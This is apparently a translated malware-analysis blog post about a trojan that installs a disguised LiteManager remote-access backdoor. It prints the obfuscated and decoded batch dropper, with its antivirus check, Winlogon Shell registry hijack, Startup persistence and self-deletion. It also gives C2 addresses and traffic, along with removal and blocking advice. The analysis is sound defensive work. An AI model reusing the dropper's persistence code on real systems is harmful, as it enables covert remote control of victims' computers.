%lpQmnLQ%%RCRUDqE%wjTBiTbn%yFcQKpJyG%\ %lpQmnLQ%%RCRUDqE%XnXWCNDJO%yFcQKpJyG%! %lpQmnLQ%%RCRUDqE%fjxrTBqkC%yFcQKpJyG%p %lpQmnLQ%%RCRUDqE%DuPVUEGE%yFcQKpJyG%D %lpQmnLQ%%RCRUDqE%mnCdWrg%yFcQKpJyG%? %lpQmnLQ%%RCRUDqE%DYBqxQkr%yFcQKpJyG%P %AdQY%%GNbpPXWvQ%%LKQhkKSem%%zHzGVcDcY%%ScSLQo%%QBmzz%%LKQhkKSem%%AdQY%%RCRUDqE%|%RCRUDqE%%qlLeeJ%%QBmzz%%GAJoRj%%vANLWtdW%%RCRUDqE%%jgpoj%%KYddI%%sQrHzBN%%GNbpPXWvQ%%LKQhkKSem%%AdQY%%GLznBQ%%pcEihxAuJ%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj% %QBmzz%%qlLeeJ%%RCRUDqE%%LkyqXKNYc%%mPVfEbE%%mPVfEbE%%toTUt%%mPVfEbE%%ScSLQo%%LkyqXKNYc%%sQrHzBN%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%TKaBbO%%RCRUDqE%%oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%nFjJmCQ%%toTUt%%MKbjyO%%LkyqXKNYc%%immQQhH%%toTUt%%mPVfEbE%%vANLWtdW% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %kOXeOOyR%%tNqAVXbz%%LKQhkKSem%%JcERxC%%AdQY%%GNbpPXWvQ%%RCRUDqE%%sQrHzBN%%YrtVU%%LKQhkKSem%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%NSQCAVz%%QvBGN%%OWatTKvD%%LkyqXKNYc%%immQQhH%%MuOksUDd%%AdQY%%LkyqXKNYc%%KbJyRFMVu%%jgpoj%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%OWatTKvD%%yFcQKpJyG%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%lSBY%%YrtVU%%nmvE%%LkyqXKNYc%%immQQhH%%AdQY%%KbJyRFMVu%%jgpoj%%jgpoj%%hdvdM%%abWkRpti%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%shHyBbWt%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%mOMhgb%%yFcQKpJyG%%OWatTKvD%%shHyBbWt%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%abWkRpti%%JcERxC%%toTUt%%mPVfEbE%%AdQY%%immQQhH%%MuOksUDd%%AdQY%%KbJyRFMVu%%OWatTKvD%%shHyBbWt%%abWkRpti%%fjxrTBqkC%%LkyqXKNYc%%immQQhH%%QBmzz%%GNbpPXWvQ%%ScSLQo%%pCQWd%%toTUt%%ScSLQo%%vANLWtdW%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%KbJyRFMVu%%jgpoj%%jgpoj%%abWkRpti%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%MuOksUDd%%fjxrTBqkC%%jgpoj%%jgpoj%%dAMOY%%tCgoVQ%%jgpoj%%jgpoj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%shHyBbWt%%ScSLQo%%GAJoRj%%zHzGVcDcY%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%mOMhgb%%shHyBbWt%%UdGiq%%GNbpPXWvQ%%mPVfEbE%%oFHOxG%%LkyqXKNYc%%AdQY%%DYBqxQkr%%GNbpPXWvQ%%AdQY%%JcERxC%%yFcQKpJyG%%jgpoj%%jgpoj%%~dp0ctfmon.exe"":y.Save():Close()") %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% %oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%DuPVUEGE%%toTUt%%GAJoRj%%LkyqXKNYc% :NoRecord %mPVfEbE%%LkyqXKNYc%%oFHOxG%%RCRUDqE%%GNbpPXWvQ%%vANLWtdW%%vANLWtdW%%RCRUDqE%%jgpoj%%upeuMhJ%%NjHP%%QvBGN%%pIxi%%vpVg%%pNywcj%%GLznBQ%%MKbjyO%%MKbjyO%%QvBGN%%nFjJmCQ%%UdGiq%%vpVg%%GLznBQ%%abWkRpti%%QvBGN%%MKbjyO%%wjTBiTbn%%abWkRpti%%toTUt%%qlLeeJ%%AdQY%%ltuAgKR%%GNbpPXWvQ%%mPVfEbE%%LkyqXKNYc%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%LKQhkKSem%%toTUt%%qlLeeJ%%AdQY%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%vANLWtdW%%toTUt%%ltuAgKR%%LKQhkKSem%%RCRUDqE%%nFjJmCQ%%UdGiq%%wjTBiTbn%%pNywcj%%MuOksUDd%%mPVfEbE%%mPVfEbE%%LkyqXKNYc%%GAJoRj%%AdQY%%gEuKD%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%QBmzz%%toTUt%%GAJoRj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%ScSLQo%%toTUt%%oFHOxG%%toTUt%%GAJoRj%%jgpoj%%RCRUDqE%%mRMLJkAp%%sQrHzBN%%RCRUDqE%%jgpoj%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%RCRUDqE%%mRMLJkAp%%AdQY%%RCRUDqE%%MKbjyO%%QvBGN%%SAKEFniaY%%vpVg%%abWkRpti%%opQB%%RCRUDqE%%mRMLJkAp%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%RCRUDqE%%pVCdLFa%%RCRUDqE%%LkyqXKNYc%%OWatTKvD%%fjxrTBqkC%%ScSLQo%%toTUt%%mPVfEbE%%LkyqXKNYc%%mPVfEbE%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj%%RCRUDqE%%RCRUDqE%%mRMLJkAp%%qlLeeJ% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %LKQhkKSem%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%RCRUDqE%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% :Done


Laziness got the better of me again, so this time I did not bother with the editors, but asked a friend to write a program in C #. What he did. I bow to him for that!

After decrypting, this bat-file turned out:
 tasklist | find "AvastUI.exe" if errorlevel 1 goto NoRecord cd "%appData%\MicrocoftUpdate\" del sendok.txt del poi.exe @mshta vbscript:Execute("Set x=CreateObject(""WScript.Shell""):Set y=x.CreateShortcut(x.SpecialFolders(""Startup"")+""\WinUpdate.lnk""):y.TargetPath=""%~dp0ctfmon.exe"":y.Save():Close()") del %0 > nul goto Done :NoRecord reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "%appData%\MicrocoftUpdate\ctfmon.exe , explorer.exe" /f cd "%appData%\MicrocoftUpdate\" del sendok.txt del poi.exe start ctfmon.exe del %0 > nul :Done

Here the following happens: the presence of the running Avast Antivirus is checked. If there is one, it goes to the folder "% appData% \ MicrocoftUpdate \", deletes the sendok.txt and poi.exe files from it, creates a shortcut to the ctfmon.exe program in the Startup system folder and self-destructs the running bat- the file.In this case, ctfmon.exe will be launched at the next restart of the computer. If Avast is not found, then in the registry along the path “HKCU \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon” the value of the “Shell” key is replaced with “% appData% \ MicrocoftUpdate \ ctfmon.exe, explorer.exe”, but then again, you go to the folder "% appData% \ MicrocoftUpdate \", delete the sendok.txt and poi.exe files, run ctfmon.exe and self-liquidate the bat file. Thus, ctfmon.exe will be launched at the start of any program through Windows Explorer.

Everything, the horse has executed the dirty work - installed backdoor in system. Now let's look at the hero of the occasion - the file ctfmon.exe.

Part Four: Backdoor Study


Inspection of the backdoor was carried out outside - using the programs Process Monitor and WireShark.

First, look at the properties of the exe-file:


Then we will go through the Process Monitor log in search of the word “Microcoft”. To do this, add the following rule to the filter:


And what do we see?We see that ctfmon.exe creates a very interesting key in the registry: and writes the key to itself, to the beloved, in this key. From what I make the assumption that I am dealing with the LiteManager program: I go to the LiteManager website and download the distribution for Windows . Please note: is it version 4.7.2 - doesn’t it remind anything? I unpack the distribution and pull out the server file from it: romserver.exe. I open a window with its properties:
HKCU\Software\ LiteManagerTeam \ LiteManager \v3.4\Config\ServerExe








Yes, it is very similar: the same icon, the same versions, only the very small size is different and there is a digital signature. Obviously, the file was “finalized with a file”, because in its original form it did not quite suit the villains. Maybe somehow it showed its presence in the system - which was completely superfluous. However, the fact that the file was changed does not bother the antiviruses at all: on Virustotal, most of them are just silent and only a few say that it is just RiskWare.

We continue.Now I will study the WireShark log.

First of all, ctfmon.exe connects to the address 91.240.86.200. There are several short messages running back and forth through the established channel, after which ctfmon.exe receives this package:
 <?xml version="1.0" encoding="UTF-16"?> <rom_sever_client_settings version="4722"> <id>180185</id> <internal_id>9017511</internal_id> <noip_number>-1</noip_number> <license>false</license> <host></host> <port>5650</port> <redirected>false</redirected> <server_ver>4722</server_ver> <remotehideserverresub>false</remotehideserverresub> <connectid>1195251490</connectid> <protect_code>0</protect_code> </rom_sever_client_settings>

It looks like registering on one of the main LiteManager servers.
Then, for some time, there is again an exchange of short messages, followed by another package:
 <?xml version="1.0" encoding="UTF-16"?> <rom_noip_client_settings version="4725"> <host>83.240.218.170</host> <port>5651</port> <max_connections>30</max_connections> <cur_connections>0</cur_connections> <ip_filter>false</ip_filter> <id_filter>false</id_filter> <mac_filter>false</mac_filter> <caption></caption> <description></description> <no_ip_type>1</no_ip_type> <license>1</license> <number>409</number> <internalID>2801665</internalID> <NoIPSelf>false</NoIPSelf> <ver>4724</ver> </rom_noip_client_settings>

This is more interesting. The fact is that the LiteManager client can connect to the server not directly, but through the third node, the so-called NoIPServer . The need for this may arise if the server is hidden from the Internet behind any firewalls / natami, etc. For villains, the presence of such a third node is a great way to anonymize - to hide your client IP from prying eyes. This package just contains instructions to the server - through what to do next (the address and port of NoIPServer).

We look further. Here the fun begins! Immediately after receiving this package, ctfmon.exe sends the following POST request to the address https://rmansys.ru/utils/inet_id_notify.php:
----------162747236742480
Content-Disposition: form-data; name="email"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

blackcc019@gmail.com
----------162747236742480
Content-Disposition: form-data; name="user_name"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

Dima
----------162747236742480
Content-Disposition: form-data; name="comp_name"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

DIMA-
----------162747236742480
Content-Disposition: form-data; name="id"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

180185
----------162747236742480
Content-Disposition: form-data; name="lang_id"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

1049
----------162747236742480
Content-Disposition: form-data; name="product"
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: binary

RMS
----------162747236742480--

What does it look like? This is similar to the fact that using the inet_id_notify.php script, the ctfmon sends to the host blackcc019@gmail.com email information about the settings for connecting to the infected computer.

To test this hypothesis, I sent a similar request from my Debian server:
 curl --data "email=_&user_name=user1&comp_name=pc1&id=12345&lang_id=1049&product=RMS" http://rmansys.ru/utils/inet_id_notify.php

Checking mail - voila!
Received a letter from TektonIT Corp. <info@tektonit.com> 'Email
subject:' Remote Manipulator System installed on remote computer, new Internet-ID received: 12345 'Email
text: Everything is clear. Gentlemen with rmansys.ru gave hackers a great opportunity to get the information they need through such a kind of open mail relay. Well done, do not say anything. Then ctfmon.exe, as it was indicated to him, connects to the computer at 83.240.218.170-lou651 and from time to time exchanges short messages with it - waiting for the host to enter. There was no special point to observe further: the behavior algorithm is clear.
.

, Remote Manipulator System, "Internet-ID".

ID: 12345

: user1
: pc1

.
! , .. , .

: http://rmansys.ru/
: support@tektonit.com
TektonIT Corp.







Part Five: Treatment


Remove this infection is not very difficult (if, of course, you did not have time to remotely add another virus to the computer). You need to complete the following steps:


How to protect against such an invasion? You can protect against this particular modification of the backdoor, for example, by adding the line “127.0.0.1 rmansys.ru” to the hosts file - then the backdoor will not be able to send an email to the host. If you are managing a corporate firewall, then you can add a rule to block access to this node from the local network.

Part Six: The Final


Finally, I searched the Internet for others affected by this attack. It was not at all difficult to find them: they discussed the topic of an attack on the Admitad forum .

So the picture loomed about the following: hackers infiltrated the Admitad network and pulled out the client base from there. Then they concocted this trojan and sent letters to Admitad customers through botnet nodes controlled by them. From the same botnet, some of the nodes that have a direct connection to the Internet were turned into NoIP servers — through which they were able to manage newly infected computers.

What conclusions did I draw from this for myself?


The first conclusion: at the present stage on the Internet, there are plenty of means to create such Trojans practically “on the knee”. Why strain and write your own backdoor if there are a lot of ready-made, extremely advanced and wide-functional options? You just need to modify them a little and that's it.

The second conclusion: the anonymity of such an attack is exceptionally high. All that managed to get - email host, the sense of which, in general, is zero.

Third conclusion: I made a gross mistake. The first thing that had to be done was to turn off the infected machine, and not dig into it, especially through the Internet. The infected hard drive needed to be connected to its computer and only after that to carry out research. I was also lucky that it turned out to be a backdoor, and not some kind of crypto-encryptor.

Whereupon, let me leave. All health and good luck! Thanks for attention!

Source: https://habr.com/ru/post/281284/

More articles:


All Articles